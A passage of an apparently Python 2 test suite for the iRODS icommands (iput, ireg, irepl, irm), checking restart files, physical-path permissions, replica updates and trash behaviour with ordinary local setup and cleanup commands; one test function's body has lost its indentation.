assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should be listed
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", self.testresc) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_interrupt_directory(self):
    """Interrupt a recursive iput via its -X restartfile, rerun the same command,
    and confirm the transfer restarts and every file arrives."""
    # local setup
    datadir = "newdatadir"
    output = commands.getstatusoutput('mkdir ' + datadir)
    datafiles = ["file1", "file2", "file3", "file4", "file5", "file6", "file7"]
    for datafilename in datafiles:
        print "-------------------"
        print "creating " + datafilename + "..."
        localpath = datadir + "/" + datafilename
        # 20 MB of zeros per file, large enough for the transfer to be interruptible
        output = commands.getstatusoutput('dd if=/dev/zero of=' + localpath + ' bs=1M count=20')
        print output[1]
        assert output[0] == 0, "dd did not successfully exit"
    rf = "collectionrestartfile"
    # assertions
    iputcmd = "iput -X " + rf + " -r " + datadir
    if os.path.exists(rf):
        os.unlink(rf)  # stale restartfile would resume instead of starting fresh
    interruptiCmd(s.adminsession, iputcmd, rf, 10)  # once restartfile reaches 10 bytes
    assert os.path.exists(rf), rf + " should now exist, but did not"
    output = commands.getstatusoutput('cat ' + rf)
    print " restartfile [" + rf + "] contents --> [" + output[1] + "]"
    assertiCmd(s.adminsession, "ils -L " + datadir, "LIST", datadir)  # just to show contents
    assertiCmd(s.adminsession, iputcmd, "LIST", "File last completed")  # confirm the restart
    for datafilename in datafiles:
        assertiCmd(s.adminsession, "ils -L " + datadir, "LIST", datafilename)  # should be listed
    # local cleanup
    output = commands.getstatusoutput('rm -rf ' + datadir)
    output = commands.getstatusoutput('rm ' + rf)
def test_local_iput_interrupt_largefile(self):
    """Interrupt a single large-file iput via its --lfrestart file, rerun, and
    confirm the upload is restarted and ends at full size."""
    # local setup
    datafilename = "bigfile"
    print "-------------------"
    print "creating " + datafilename + "..."
    # 150 MB of zeros, large enough for a multi-threaded interruptible transfer
    output = commands.getstatusoutput('dd if=/dev/zero of=' + datafilename + ' bs=1M count=150')
    print output[1]
    assert output[0] == 0, "dd did not successfully exit"
    rf = "bigrestartfile"
    # assertions
    iputcmd = "iput --lfrestart " + rf + " " + datafilename
    if os.path.exists(rf):
        os.unlink(rf)  # stale restartfile would resume instead of starting fresh
    interruptiCmd(s.adminsession, iputcmd, rf, 10)  # once restartfile reaches 10 bytes
    time.sleep(2)  # wait for all interrupted threads to exit
    assert os.path.exists(rf), rf + " should now exist, but did not"
    output = commands.getstatusoutput('cat ' + rf)
    print " restartfile [" + rf + "] contents --> [" + output[1] + "]"
    today = datetime.date.today()
    # length should not be zero
    assertiCmdFail(s.adminsession, "ils -L " + datafilename, "LIST", [" 0 " + today.isoformat(), datafilename])
    # confirm the restart
    assertiCmd(s.adminsession, iputcmd, "LIST", datafilename + " was restarted successfully")
    assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST",
               [" " + str(os.stat(datafilename).st_size) + " " + today.isoformat(), datafilename])  # length should be size on disk
    # local cleanup
    output = commands.getstatusoutput('rm ' + datafilename)
    output = commands.getstatusoutput('rm ' + rf)
def test_local_iput_physicalpath_no_permission(self):
    """iput -p pointing at an unwritable physical path (filesystem root) must
    fail with UNIX_FILE_CREATE_ERR / Permission denied."""
    # local setup
    datafilename = "newfile.txt"
    # context manager closes the handle even if the write fails
    # (was open/write/close; now consistent with the checksum tests above)
    with open(datafilename, 'wb') as f:
        f.write("TESTFILE -- [" + datafilename + "]")
    # assertions
    assertiCmd(s.adminsession, "iput -p /newfileinroot.txt " + datafilename, "ERROR",
               ["UNIX_FILE_CREATE_ERR", "Permission denied"])  # should fail to write
    # local cleanup
    output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_physicalpath(self):
    """iput -p with an absolute physical path under the iRODS install tree must
    succeed and record that path for the new object."""
    # local setup
    datafilename = "newfile.txt"
    # context manager closes the handle even if the write fails
    # (was open/write/close; now consistent with the checksum tests above)
    with open(datafilename, 'wb') as f:
        f.write("TESTFILE -- [" + datafilename + "]")
    # assertions
    fullpath = get_irods_top_level_dir() + "/newphysicalpath.txt"
    assertiCmd(s.adminsession, "iput -p " + fullpath + " " + datafilename)  # should complete
    assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", datafilename)  # should be listed
    assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", fullpath)  # should be listed
    # local cleanup
    output = commands.getstatusoutput('rm ' + datafilename)
def test_admin_local_iput_relative_physicalpath_into_server_bin(self):
    """iput -p with a relative physical path must be rejected (even for the
    admin) with an 'absolute' path error."""
    # local setup
    datafilename = "newfile.txt"
    # context manager closes the handle even if the write fails
    # (was open/write/close; now consistent with the checksum tests above)
    with open(datafilename, 'wb') as f:
        f.write("TESTFILE -- [" + datafilename + "]")
    # assertions
    relpath = "relativephysicalpath.txt"
    # should disallow relative path
    assertiCmd(s.adminsession, "iput -p " + relpath + " " + datafilename, "ERROR", "absolute")
    # local cleanup
    output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_relative_physicalpath_into_server_bin(self):
    """iput -p with a relative physical path must be rejected for a plain user
    with an 'absolute' path error."""
    # local setup
    datafilename = "newfile.txt"
    # context manager closes the handle even if the write fails
    # (was open/write/close; now consistent with the checksum tests above)
    with open(datafilename, 'wb') as f:
        f.write("TESTFILE -- [" + datafilename + "]")
    # assertions
    relpath = "relativephysicalpath.txt"
    assertiCmd(s.sessions[1], "iput -p " + relpath + " " + datafilename, "ERROR", "absolute")  # should error
    # local cleanup
    output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_with_changed_target_filename(self):
    """iput LOCAL TARGET stores the object under the target name, not the local
    filename."""
    # local setup
    datafilename = "newfile.txt"
    # context manager closes the handle even if the write fails
    # (was open/write/close; now consistent with the checksum tests above)
    with open(datafilename, 'wb') as f:
        f.write("TESTFILE -- [" + datafilename + "]")
    # assertions
    changedfilename = "different.txt"
    assertiCmd(s.adminsession, "iput " + datafilename + " " + changedfilename)  # should complete
    assertiCmd(s.adminsession, "ils -L " + changedfilename, "LIST", changedfilename)  # should be listed
    # local cleanup
    output = commands.getstatusoutput('rm ' + datafilename)
@unittest.skip("TODO: revisit later, this is causing issues with mysql")
def test_local_iput_collision_with_wlock(self):
    """Run several concurrent forced iputs of the same file with --wlock and
    assert that none of them errors (the write lock serializes them).

    The first iput is delayed so the later ones collide with it; total elapsed
    time must exceed that delay, showing the processes actually overlapped.
    """
    # local setup
    datafilename = "collisionfile1.txt"
    print "-------------------"
    print "creating " + datafilename + "..."
    output = commands.getstatusoutput('dd if=/dev/zero of=' + datafilename + ' bs=1M count=30')
    print output[1]
    assert output[0] == 0, "dd did not successfully exit"
    # assertions
    begin = time.time()
    errorflag = False
    procs = set()
    pids = set()
    # start multiple icommands in parallel
    initialdelay = 3  # seconds
    for i in range(5):
        if i == 0:
            # add a three second delay before the first icommand
            p = s.adminsession.runCmd(
                'iput', ["-vf", "--wlock", datafilename], waitforresult=False, delay=initialdelay)
        else:
            p = s.adminsession.runCmd('iput', ["-vf", "--wlock", datafilename], waitforresult=False, delay=0)
        procs.add(p)
        pids.add(p.pid)
    # reap children as they exit; any nonzero status is a failure
    while pids:
        pid, retval = os.wait()
        for proc in procs:
            if proc.pid == pid:
                print "pid " + str(pid) + ":"
                if retval != 0:
                    print "  * ERROR occurred * <------------"
                    errorflag = True
                print "  retval [" + str(retval) + "]"
                print "  stdout [" + proc.stdout.read().strip() + "]"
                print "  stderr [" + proc.stderr.read().strip() + "]"
                pids.remove(pid)
    elapsed = time.time() - begin
    print "\ntotal time [" + str(elapsed) + "]"
    assert elapsed > initialdelay
    # local cleanup
    output = commands.getstatusoutput('rm ' + datafilename)
    assert errorflag == False, "oops, had an error"
@unittest.skip("TODO: revisit later, not sure this is testing anything of interest")
def test_local_iput_collision_without_wlock(self):
    """Run several concurrent forced iputs of the same file WITHOUT --wlock and
    assert that at least one of them errors (unserialized writers collide)."""
    # local setup
    datafilename = "collisionfile2.txt"
    print "-------------------"
    print "creating " + datafilename + "..."
    output = commands.getstatusoutput('dd if=/dev/zero of=' + datafilename + ' bs=1M count=30')
    print output[1]
    assert output[0] == 0, "dd did not successfully exit"
    # assertions
    begin = time.time()
    errorflag = False
    procs = set()
    pids = set()
    # start multiple icommands in parallel
    initialdelay = 3  # seconds
    for i in range(7):
        if i == 0:
            # add a three second delay before the first icommand
            p = s.adminsession.runCmd('iput', ["-vf", datafilename], waitforresult=False, delay=initialdelay)
        else:
            p = s.adminsession.runCmd('iput', ["-vf", datafilename], waitforresult=False, delay=0)
        procs.add(p)
        pids.add(p.pid)
    # reap children as they exit; here a nonzero status is the EXPECTED outcome
    while pids:
        pid, retval = os.wait()
        for proc in procs:
            if proc.pid == pid:
                print "pid " + str(pid) + ":"
                if retval != 0:
                    errorflag = True
                else:
                    print "  * Unexpectedly, No ERROR occurred * <------------"
                print "  retval [" + str(retval) + "]"
                print "  stdout [" + proc.stdout.read().strip() + "]"
                print "  stderr [" + proc.stderr.read().strip() + "]"
                pids.remove(pid)
    elapsed = time.time() - begin
    print "\ntotal time [" + str(elapsed) + "]"
    # local cleanup
    output = commands.getstatusoutput('rm ' + datafilename)
    assert errorflag == True, "Expected ERRORs did not occur"
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_iput_overwrite_others_file__ticket_2086(self):
# pre state
assertiCmd(s.adminsession, "ils -L", "LIST", self.testfile) # should be listed
# local setup
filename = "overwritefile.txt"
filepath = create_local_testfile(filename)
# alice tries to put
homepath = "/home/" + s.adminsession.getUserName() + "/" + s.adminsession.sessionId + "/" + self.testfile
logicalpath = "/" + s.adminsession.getZoneName() + homepath
assertiCmd(s.sessions[1], "iput " + filepath + " " + logicalpath, "ERROR", "CAT_NO_ACCESS_PERMISSION") # iput
# check physicalpaths (of all replicas)
cmdout = s.adminsession.runCmd('ils', ['-L'])
print "[ils -L]:"
print "[" + cmdout[0] + "]"
lines = cmdout[0].splitlines()
for l in cmdout[0].splitlines():
if "demoResc" in l:
if "/session-" in l:
physicalpath = l.split()[2]
# check file is on disk
print "[ls -l " + physicalpath + "]:"
os.system("ls -l " + physicalpath)
assert os.path.exists(physicalpath)
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
def test_iput_with_purgec(self):
    """iput --purgec leaves exactly one replica (replica 0) registered."""
    # local setup
    filename = "purgecfile.txt"
    filepath = os.path.abspath(filename)
    # context manager closes the handle even if the write fails
    # (was open/write/close; now consistent with the checksum tests above)
    with open(filepath, 'wb') as f:
        f.write("TESTFILE -- [" + filepath + "]")
    # assertions
    assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist")  # should not be listed
    assertiCmd(s.adminsession, "iput --purgec " + filename)  # put file
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", filename])  # should be listed once
    assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", filename])  # should be listed only once
    assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", filename])  # should be listed only once
    # local cleanup
    output = commands.getstatusoutput('rm ' + filepath)
def test_local_iput_with_force_and_destination_resource__ticket_1706(self):
    """iput -f -R onto a replicated object must update only the targeted
    replica; the other replica stays (dirty) at its old size."""
    # local setup
    filename = "iputwithforceanddestination.txt"
    filepath = create_local_testfile(filename)
    doublefile = "doublefile.txt"
    # doublefile is the file concatenated with itself, so its size differs
    os.system("cat %s %s > %s" % (filename, filename, doublefile))
    doublesize = str(os.stat(doublefile).st_size)
    # assertions
    assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist")  # should not be listed
    assertiCmd(s.adminsession, "iput " + filename)  # put file
    assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename)  # replicate to test resource
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename)
    # overwrite test repl with different data
    assertiCmd(s.adminsession, "iput -f -R %s %s %s" % (self.testresc, doublefile, filename))
    # default resource should have dirty copy
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " " + filename])
    # default resource should not have doublesize file
    assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " " + doublesize + " ", " " + filename])
    # targeted resource should have new double clean copy
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", " " + doublesize + " ", "& " + filename])
    # local cleanup
    os.remove(filepath)
    os.remove(doublefile)
###################
# ireg
###################
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_ireg_as_rodsadmin(self):
    """A rodsadmin may ireg (register in place) a local file into the catalog."""
    # local setup
    filename = "newfile.txt"
    filepath = os.path.abspath(filename)
    # context manager closes the handle even if the write fails
    # (was open/write/close; now consistent with the checksum tests above)
    with open(filepath, 'wb') as f:
        f.write("TESTFILE -- [" + filepath + "]")
    # assertions
    assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist")  # should not be listed
    assertiCmd(s.adminsession, "ireg " + filepath + " /" + s.adminsession.getZoneName() + "/home/" +
               s.adminsession.getUserName() + "/" + s.adminsession.sessionId + "/" + filename)  # ireg
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename)  # should be listed
    # local cleanup
    output = commands.getstatusoutput('rm ' + filepath)
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_ireg_as_rodsuser(self):
    """A plain rodsuser must be denied ireg (PATH_REG_NOT_ALLOWED)."""
    # local setup
    filename = "newfile.txt"
    filepath = os.path.abspath(filename)
    # context manager closes the handle even if the write fails
    # (was open/write/close; now consistent with the checksum tests above)
    with open(filepath, 'wb') as f:
        f.write("TESTFILE -- [" + filepath + "]")
    # assertions
    assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist")  # should not be listed
    assertiCmd(s.sessions[1], "ireg " + filepath + " /" + s.sessions[1].getZoneName() + "/home/" + s.sessions[
        1].getUserName() + "/" + s.sessions[1].sessionId + "/" + filename, "ERROR", "PATH_REG_NOT_ALLOWED")  # ireg
    assertiCmdFail(s.sessions[1], "ils -L " + filename, "LIST", filename)  # should not be listed
    # local cleanup
    output = commands.getstatusoutput('rm ' + filepath)
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_ireg_as_rodsuser_in_vault(self):
    """A rodsuser must be denied ireg even for a file that already sits inside
    the resource vault (PATH_REG_NOT_ALLOWED)."""
    # get vault base path
    cmdout = s.sessions[1].runCmd('iquest', ["%s", "select RESC_VAULT_PATH where RESC_NAME = 'demoResc'"])
    vaultpath = cmdout[0].rstrip('\n')
    # make dir in vault if necessary ('vault_dir' -- was 'dir', which shadowed the builtin)
    vault_dir = os.path.join(vaultpath, 'home', s.sessions[1].getUserName())
    if not os.path.exists(vault_dir):
        os.makedirs(vault_dir)
    # create file in vault; context manager closes the handle even if the write fails
    filename = "newfile.txt"
    filepath = os.path.join(vault_dir, filename)
    with open(filepath, 'wb') as f:
        f.write("TESTFILE -- [" + filepath + "]")
    # assertions
    assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist")  # should not be listed
    assertiCmd(s.sessions[1], "ireg " + filepath + " /" + s.sessions[1].getZoneName() + "/home/" + s.sessions[
        1].getUserName() + "/" + s.sessions[1].sessionId + "/" + filename, "ERROR", "PATH_REG_NOT_ALLOWED")  # ireg
    assertiCmdFail(s.sessions[1], "ils -L " + filename, "LIST", filename)  # should not be listed
    # local cleanup
    output = commands.getstatusoutput('rm ' + filepath)
###################
# irepl
###################
def test_irepl_invalid_input(self):
    """irepl -R onto a nonexistent resource must fail with SYS_INVALID_INPUT_PARAM."""
    # local setup
    filename = "somefile.txt"
    filepath = create_local_testfile(filename)
    # assertions
    # should not be listed
    assertiCmd(s.adminsession, "ils -L " + filename, "STDERR", "does not exist")
    assertiCmd(s.adminsession, "iput " + filename)  # put file
    # for debugging
    assertiCmd(s.adminsession, "ils -L " + filename, "STDOUT", filename)
    # replicate to bad resource
    assertiCmd(s.adminsession, "irepl -R nonresc " + filename, "STDERR", "SYS_INVALID_INPUT_PARAM")
    assertiCmd(s.adminsession, "irm -f " + filename)  # cleanup file
    # local cleanup
    os.remove(filepath)
def test_irepl_multithreaded(self):
    """irepl -N 3 (multi-threaded) of a large file onto the test resource."""
    # local setup
    filename = "largefile.txt"
    filepath = create_local_largefile(filename)
    # assertions
    assertiCmd(s.adminsession, "ils -L " + filename, "STDERR", "does not exist")  # should not be listed
    assertiCmd(s.adminsession, "iput " + filename)  # put file
    assertiCmd(s.adminsession, "ils -L " + filename, "STDOUT", filename)  # for debugging
    assertiCmd(s.adminsession, "irepl -R " + self.testresc + " -N 3 " + filename)  # replicate to test resource
    # test resource should be listed
    assertiCmd(s.adminsession, "ils -l " + filename, "STDOUT", self.testresc)
    assertiCmd(s.adminsession, "irm -f " + filename)  # cleanup file
    # local cleanup
    os.remove(filepath)
def test_irepl_update_replicas(self):
    """After overwriting one of four replicas, irepl -U updates only the last
    stale replica and irepl -aU brings every replica clean ('&' marker)."""
    # local setup
    filename = "updatereplicasfile.txt"
    filepath = create_local_testfile(filename)
    hostname = get_hostname()
    doublefile = "doublefile.txt"
    # doublefile is the file concatenated with itself, so its size differs
    os.system("cat %s %s > %s" % (filename, filename, doublefile))
    doublesize = str(os.stat(doublefile).st_size)
    # assertions
    assertiCmd(s.adminsession, "iadmin mkresc thirdresc unixfilesystem %s:/tmp/thirdrescVault" %
               hostname, "LIST", "Creating")  # create third resource
    assertiCmd(s.adminsession, "iadmin mkresc fourthresc unixfilesystem %s:/tmp/fourthrescVault" %
               hostname, "LIST", "Creating")  # create fourth resource
    assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist")  # should not be listed
    assertiCmd(s.adminsession, "iput " + filename)  # put file
    # replicate to test resource
    assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename)
    # replicate to third resource
    assertiCmd(s.adminsession, "irepl -R thirdresc " + filename)
    # replicate to fourth resource
    assertiCmd(s.adminsession, "irepl -R fourthresc " + filename)
    # repave overtop test resource
    assertiCmd(s.adminsession, "iput -f -R " + self.testresc + " " + doublefile + " " + filename)
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename)  # for debugging
    # should have a dirty copy
    assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " & " + filename])
    # should have a clean copy
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", " & " + filename])
    # should have a dirty copy
    assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
    # should have a dirty copy
    assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 3 ", " & " + filename])
    assertiCmd(s.adminsession, "irepl -U " + filename)  # update last replica
    # should have a dirty copy
    assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " & " + filename])
    # should have a clean copy
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", " & " + filename])
    # should have a dirty copy
    assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
    # should have a clean copy
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 3 ", " & " + filename])
    assertiCmd(s.adminsession, "irepl -aU " + filename)  # update all replicas
    # should have a clean copy
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " & " + filename])
    # should have a clean copy
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", " & " + filename])
    # should have a clean copy
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
    # should have a clean copy
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 3 ", " & " + filename])
    assertiCmd(s.adminsession, "irm -f " + filename)  # cleanup file
    assertiCmd(s.adminsession, "iadmin rmresc thirdresc")  # remove third resource
    assertiCmd(s.adminsession, "iadmin rmresc fourthresc")  # remove fourth resource
    # local cleanup
    os.remove(filepath)
    os.remove(doublefile)
def test_irepl_over_existing_second_replica__ticket_1705(self):
    """Replicating over an already-existing replica must not create a third
    replica (no replica number 2 appears)."""
    # local setup
    filename = "secondreplicatest.txt"
    filepath = create_local_testfile(filename)
    # assertions
    assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist")  # should not be listed
    assertiCmd(s.adminsession, "iput -R " + self.testresc + " " + filename)  # put file
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename)  # for debugging
    assertiCmd(s.adminsession, "irepl " + filename)  # replicate to default resource
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename)  # for debugging
    assertiCmd(s.adminsession, "irepl " + filename)  # replicate overtop default resource
    # should not have a replica 2
    assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
    assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename)  # replicate overtop test resource
    # should not have a replica 2
    assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
    # local cleanup
    os.remove(filepath)
def test_irepl_over_existing_third_replica__ticket_1705(self):
    """Replicating over existing replicas on three resources must not create
    extra replicas (no replica number 3 or 4 appears)."""
    # local setup
    filename = "thirdreplicatest.txt"
    filepath = create_local_testfile(filename)
    hostname = get_hostname()
    # assertions
    assertiCmd(s.adminsession, "iadmin mkresc thirdresc unixfilesystem %s:/tmp/thirdrescVault" %
               hostname, "LIST", "Creating")  # create third resource
    assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist")  # should not be listed
    assertiCmd(s.adminsession, "iput " + filename)  # put file
    assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename)  # replicate to test resource
    assertiCmd(s.adminsession, "irepl -R thirdresc " + filename)  # replicate to third resource
    assertiCmd(s.adminsession, "irepl " + filename)  # replicate overtop default resource
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename)  # for debugging
    assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename)  # replicate overtop test resource
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename)  # for debugging
    assertiCmd(s.adminsession, "irepl -R thirdresc " + filename)  # replicate overtop third resource
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename)  # for debugging
    # should not have a replica 3
    assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 3 ", " & " + filename])
    # should not have a replica 4
    assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 4 ", " & " + filename])
    assertiCmd(s.adminsession, "irm -f " + filename)  # cleanup file
    assertiCmd(s.adminsession, "iadmin rmresc thirdresc")  # remove third resource
    # local cleanup
    os.remove(filepath)
def test_irepl_over_existing_bad_replica__ticket_1705(self):
    """After the source replica is overwritten with larger data, irepl onto the
    stale replica must repave it in place (no new replica number)."""
    # local setup
    filename = "reploverwritebad.txt"
    filepath = create_local_testfile(filename)
    doublefile = "doublefile.txt"
    # doublefile is the file concatenated with itself, so its size differs
    os.system("cat %s %s > %s" % (filename, filename, doublefile))
    doublesize = str(os.stat(doublefile).st_size)
    # assertions
    assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist")  # should not be listed
    assertiCmd(s.adminsession, "iput " + filename)  # put file
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename)  # for debugging
    assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename)  # replicate to test resource
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename)  # for debugging
    # overwrite default repl with different data
    assertiCmd(s.adminsession, "iput -f %s %s" % (doublefile, filename))
    # default resource should have clean copy
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " & " + filename])
    # default resource should have new double clean copy
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " " + doublesize + " ", " & " + filename])
    # test resource should not have doublesize file
    assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST",
                   [" 1 " + self.testresc, " " + doublesize + " ", "  " + filename])
    # replicate back onto test resource
    assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename)
    # test resource should have new clean doublesize file
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST",
               [" 1 " + self.testresc, " " + doublesize + " ", " & " + filename])
    # should not have a replica 2
    assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
    # local cleanup
    os.remove(filepath)
    os.remove(doublefile)
# repl update ( repave old copies )
# walk through command line switches
def test_irepl_with_purgec(self):
    """irepl --purgec trims the source replica, leaving only replica 1."""
    # local setup
    filename = "purgecreplfile.txt"
    filepath = os.path.abspath(filename)
    # context manager closes the handle even if the write fails
    # (was open/write/close; now consistent with the checksum tests above)
    with open(filepath, 'wb') as f:
        f.write("TESTFILE -- [" + filepath + "]")
    # assertions
    assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist")  # should not be listed
    assertiCmd(s.adminsession, "iput " + filename)  # put file
    assertiCmd(s.adminsession, "irepl -R " + self.testresc + " --purgec " + filename)  # replicate to test resource
    assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", filename])  # should be trimmed
    assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", filename])  # should be listed once
    assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", filename])  # should be listed only once
    # local cleanup
    output = commands.getstatusoutput('rm ' + filepath)
def test_irepl_with_admin_mode(self):
    """An admin can recursively replicate another user's collection with -M."""
    pydevtest_common.touch("file.txt")
    # put 100 small objects as the plain user
    for i in range(0, 100):
        assertiCmd(s.sessions[1], "iput file.txt " + str(i) + ".txt", "EMPTY")
    homepath = "/" + s.adminsession.getZoneName() + "/home/" + s.sessions[1].getUserName() + "/" + s.sessions[1].sessionId
    assertiCmd(s.adminsession, "irepl -r -M -R " + self.testresc + " " + homepath, "EMPTY")  # creates replica
###################
# irm
###################
def test_irm_doesnotexist(self):
    """irm of a nonexistent object must fail."""
    assertiCmdFail(s.adminsession, "irm doesnotexist")  # does not exist
def test_irm(self):
    """Plain irm moves the object to the user's trash collection."""
    assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile)  # should be listed
    assertiCmd(s.adminsession, "irm " + self.testfile)  # remove from grid
    assertiCmdFail(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile)  # should be deleted
    trashpath = "/" + s.adminsession.getZoneName() + "/trash/home/" + s.adminsession.getUserName() + \
        "/" + s.adminsession.sessionId
    # should be in trash
    assertiCmd(s.adminsession, "ils -L " + trashpath + "/" + self.testfile, "LIST", self.testfile)
def test_irm_force(self):
    """irm -f removes the object permanently, bypassing the trash collection."""
    assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile)  # should be listed
    assertiCmd(s.adminsession, "irm -f " + self.testfile)  # remove from grid
    assertiCmdFail(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile)  # should be deleted
    trashpath = "/" + s.adminsession.getZoneName() + "/trash/home/" + s.adminsession.getUserName() + \
        "/" + s.adminsession.sessionId
    # should not be in trash
    assertiCmdFail(s.adminsession, "ils -L " + trashpath + "/" + self.testfile, "LIST", self.testfile)
def test_irm_specific_replica(self):
    """irm -n 0 removes only replica 0; replica 1 survives and nothing lands in
    the trash."""
    assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile)  # should be listed
    assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + self.testfile)  # creates replica
    assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile)  # should be listed twice
    assertiCmd(s.adminsession, "irm -n 0 " + self.testfile)  # remove original from grid
    # replica 1 should be there
    assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", ["1 " + self.testresc, self.testfile])
    assertiCmdFail(s.adminsession, "ils -L " + self.testfile, "LIST",
                   ["0 " + s.adminsession.getDefResource(), self.testfile])  # replica 0 should be gone
    trashpath = "/" + s.adminsession.getZoneName() + "/trash/home/" + s.adminsession.getUserName() + \
        "/" + s.adminsession.sessionId
    assertiCmdFail(s.adminsession, "ils -L " + trashpath + "/" + self.testfile, "LIST",
                   ["0 " + s.adminsession.getDefResource(), self.testfile])  # replica should not be in trash
def test_irm_recursive_file(self):
    """irm -r on a plain data object (not a collection) must still succeed."""
    assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile)  # should be listed
    assertiCmd(s.adminsession, "irm -r " + self.testfile)  # -r is tolerated even though target is not a collection
def test_irm_recursive(self):
    """irm -r removes a whole collection."""
    assertiCmd(s.adminsession, "icp -r " + self.testdir + " copydir")  # make a dir copy
    assertiCmd(s.adminsession, "ils -L ", "LIST", "copydir")  # should be listed
    assertiCmd(s.adminsession, "irm -r copydir")  # should remove
    assertiCmdFail(s.adminsession, "ils -L ", "LIST", "copydir")  # should not be listed
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_irm_with_read_permission(self):
    """A user with only read permission must not be able to irm the object."""
    assertiCmd(s.sessions[1], "icd ../../public")  # switch to shared area
    assertiCmd(s.sessions[1], "ils -AL " + self.testfile, "LIST", self.testfile)  # should be listed
    assertiCmdFail(s.sessions[1], "irm " + self.testfile)  # read perm should not be allowed to remove
    assertiCmd(s.sessions[1], "ils -AL " + self.testfile, "LIST", self.testfile)  # should still be listed
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_irm_with_write_permission(self):
    """A user with only write permission must not be able to irm the object
    (delete requires own permission)."""
    assertiCmd(s.sessions[2], "icd ../../public")  # switch to shared area
    assertiCmd(s.sessions[2], "ils -AL " + self.testfile, "LIST", self.testfile)  # should be listed
